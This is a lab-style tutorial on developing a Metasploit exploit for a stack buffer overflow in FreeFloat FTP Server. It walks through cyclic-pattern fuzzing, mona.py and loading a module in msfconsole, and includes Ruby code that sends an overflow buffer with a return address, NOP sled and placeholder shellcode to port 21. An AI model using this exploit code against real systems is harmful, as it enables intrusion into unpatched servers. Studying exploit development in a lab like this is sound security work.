Types of Exploits
Types of Exploits in Metasploit:
- Active
- Passive
The core difference is who initiates the connection. An active exploit connects out to a specific target, runs to completion and then exits; the FreeFloat FTP exploit in this guide is active, because we connect to the server on port 21. A passive exploit starts a listener and waits for a victim to connect in (typically a browser or other client exploit), firing only when an incoming host connects. It helps to know this beforehand, because it decides whether your module connects out or listens, and the distinction plays a clearer role when you graduate to writing more complicated exploits.
Our Setup
The software used in this tutorial is the following:
- The target: FreeFloat FTP Server, a small Windows FTP daemon with a known stack buffer overflow in its command handling, running on the victim machine.
- Immunity Debugger: a Windows debugger used for exploit development and reverse engineering of binaries; it is available free from Immunity.
- Windows XP Service Pack 3: the victim machine, with FreeFloat FTP Server installed and Immunity Debugger attached to it.
- Kali Linux: the attacker machine, which ships with the Metasploit Framework.
- Mona.py: Corelan's Python plugin for Immunity Debugger. Download mona.py and copy it into the debugger's PyCommands folder; it is then available as !mona from the debugger's command bar.
The Process
Imitate Fuzzing
We will not run a real fuzzer; instead we send one overlong command argument and watch where the server crashes. The data is not random: it is a 1,000-character cyclic pattern (the output of Metasploit's pattern_create, or !mona pc 1000) in which no four bytes repeat, so whatever lands in EIP identifies its own offset in the buffer. We send it to port 21, the FTP server's command port, as the argument of an FTP command.
Attach Immunity Debugger to the running FreeFloat FTP process before you send anything, since the crash is only useful if the debugger catches it. Once the fuzzing module has sent the pattern, check the registers pane: EIP should now hold four bytes of the pattern (an ASCII value made of letters and digits), which confirms that the saved return address was overwritten and gives !mona po or pattern_offset the value it needs.
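What the fuzzing step relies on, as an added example in plain Ruby (not the page's own code, and not Metasploit's or mona's implementation): pattern_create builds the same cyclic pattern that pattern_create.rb and !mona pc emit, pattern_offset performs the same lookup as pattern_offset.rb and !mona po, and send_pattern delivers the buffer over an open connection. The host in the comments, the USER command and the EIP value 37684136 discussed below are constructed illustrations, not claims about FreeFloat.

```ruby
require 'socket'

# Added example, not the framework's own code: the cyclic pattern that
# Metasploit's pattern_create.rb (and !mona pc) produce, and the reverse
# lookup that pattern_offset.rb (and !mona po) perform, written from the
# published algorithm so the mechanism is visible.

UPPER  = ('A'..'Z').to_a
LOWER  = ('a'..'z').to_a
DIGITS = ('0'..'9').to_a

# "Aa0Aa1Aa2...Aa9Ab0Ab1..." truncated to +length+ bytes. Position 3k holds
# an upper-case letter, 3k+1 a lower-case one, 3k+2 a digit, and the three
# counters advance like an odometer, so no four-byte window repeats inside
# the 26*26*10*3 = 20,280-byte cycle. That property makes EIP self-locating.
def pattern_create(length)
  buf = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGITS.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]
end

# Map the value Immunity shows in EIP (e.g. "37684136" or "0x37684136")
# back to the offset at which those four bytes start in the pattern.
# x86 is little-endian, so the register value is the four pattern bytes
# in reverse order; the raw order is tried as well in case the bytes were
# copied straight from the stack dump. Returns nil if EIP did not come
# from the pattern at all (a sign the crash is not what you think it is).
def pattern_offset(eip_hex, length = UPPER.size * LOWER.size * DIGITS.size * 3)
  hex = eip_hex.sub(/\A0x/i, '')
  raise ArgumentError, 'expected 8 hex digits' unless hex.match?(/\A\h{8}\z/)
  bytes   = [hex].pack('H*')
  pattern = pattern_create(length)
  [bytes.reverse, bytes].each do |needle|
    idx = pattern.index(needle)
    return idx if idx
  end
  nil
end

# The "pseudo-fuzz": read the banner, then send the pattern as the argument
# of one FTP command over the already-open connection +io+ (a TCPSocket in
# practice, e.g. TCPSocket.new('192.0.2.10', 21); a StringIO in the test).
def send_pattern(io, command = 'USER', length = 1000)
  banner = io.gets
  io.write("#{command} #{pattern_create(length)}\r\n")
  banner
end
```

Running pattern_offset('37684136') against this pattern returns 230: the four bytes that overwrote the return address started 230 bytes into the argument, and that number is the offset the exploit needs. A nil result means EIP did not come from your buffer, so the crash is something else and the offset would be meaningless. Current Metasploit gives the same answers with pattern_create.rb -l 1000 and pattern_offset.rb -q 37684136.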
Fire Up Mona
With EIP overwritten, let mona do the bookkeeping. In Immunity Debugger's command bar (the input line at the bottom of the window), enter !mona suggest.
Mona asks what kind of skeleton to generate: choose TCP client, since this exploit connects out to the server, and enter port 21 to continue. Mona then works out the offset to EIP from the pattern it finds in the crash, looks for a usable return address, and writes a Metasploit exploit module.
Customize Exploit
The result is a Ruby file: a Metasploit module with the connection details, offset and return address mona found already filled in. You can modify it any way you want: give the module a proper name and description, check the target's return address, set the payload space, and make sure the bad-character list contains at least \x00, \x0a and \x0d, since those bytes end the FTP command before the overflow reaches the return address. Here we simply rename the file to f.rb.
Launch the Exploit in Metasploit
Copy f.rb to the Kali box and put it where the framework will find it: the per-user module tree under ~/.msf4/modules/exploits/, mirroring the framework's own layout (for example ~/.msf4/modules/exploits/windows/ftp/f.rb). Start msfconsole, or run reload_all if it is already open, then use the module.
If msfconsole loads the module without complaint and show options lists the remote host, RPORT 21 and the target, Metasploit has accepted the file and it is compatible with the framework; a syntax error in the file shows up instead as a load failure that names the file.
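The buffer that f.rb ends up sending, as an added example in plain Ruby that is neither the page's code nor the skeleton mona generates: it lays out junk, return address, NOP sled and shellcode, refuses to build a buffer containing a byte the FTP parser would truncate on, and delivers it as the USER argument. OFFSET, RET_ADDR, the INT3 placeholder shellcode and the host are assumed placeholders, not FreeFloat values; take the real offset from the pattern lookup and the real JMP ESP address from mona.

```ruby
require 'socket'

# Added example, not code from the original page or from mona's skeleton.
# Bytes the FTP command parser will not pass through intact: NUL ends the
# C string, CR and LF end the command line. Any of these inside the
# buffer truncates the overflow before it reaches the return address.
BADCHARS = "\x00\x0a\x0d".b

# Constructed placeholder values. Replace OFFSET with the number the
# pattern lookup gave you and RET_ADDR with the JMP ESP address mona
# reported (e.g. from !mona jmp -r esp); neither is a real FreeFloat value.
OFFSET   = 230
RET_ADDR = 0x0BADCAFE

# Placeholder shellcode: INT3 breakpoints, so the debugger stops exactly
# where execution lands and you can verify the jump before dropping in a
# real payload (generate that with msfvenom and the same bad-char list).
SHELLCODE = "\xCC\xCC\xCC\xCC".b

# Return the distinct bytes of +buf+ that appear in +bad+ ("" if clean).
def bad_bytes(buf, bad = BADCHARS)
  buf.b.bytes.uniq.select { |byte| bad.bytes.include?(byte) }.pack('C*')
end

# Lay out the classic stack overflow buffer:
#   junk (offset bytes) | return address | NOP sled | shellcode
# The return address is packed little-endian ('V') because that is how
# the x86 CPU reads the saved EIP off the stack. Refuses to build a
# buffer that contains a bad character anywhere, return address included.
def build_exploit(offset: OFFSET, ret: RET_ADDR, shellcode: SHELLCODE, nops: 16)
  buf  = 'A'.b * offset
  buf << [ret].pack('V')
  buf << "\x90".b * nops
  buf << shellcode.b
  found = bad_bytes(buf)
  raise "buffer contains bad chars: #{found.unpack1('H*')}" unless found.empty?
  buf
end

# Read the server banner, then deliver the buffer as the USER argument.
# +io+ is a TCPSocket against the target; the test passes a StringIO.
def send_user_overflow(io, buf)
  banner = io.gets
  io.write("USER #{buf}\r\n")
  banner
end

# Usage from the attacker box (host is an assumed example address):
#   exploit_host('192.0.2.10')
def exploit_host(host, port = 21)
  sock = TCPSocket.new(host, port)
  banner = send_user_overflow(sock, build_exploit)
  sock.close
  banner
end
```

In the generated module the same pieces live in the info hash and the exploit method: the return address under 'Targets' => [['Windows XP SP3', { 'Ret' => 0x... }]], the bad characters under 'Payload' => { 'BadChars' => "\x00\x0a\x0d" } so the framework encodes the payload around them for you, and the buffer itself as rand_text_alpha(offset) + [target.ret].pack('V') + make_nops(16) + payload.encoded. Building with a return address whose low byte is 0x0d (as the test does) is the kind of mistake the bad-character check exists to catch: the server would see the command end mid-address and the exploit would silently fail.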
Conclusion
This was a mini-tutorial on how to write a Metasploit exploit. We will discuss more complicated exploits and see how they are written in future articles.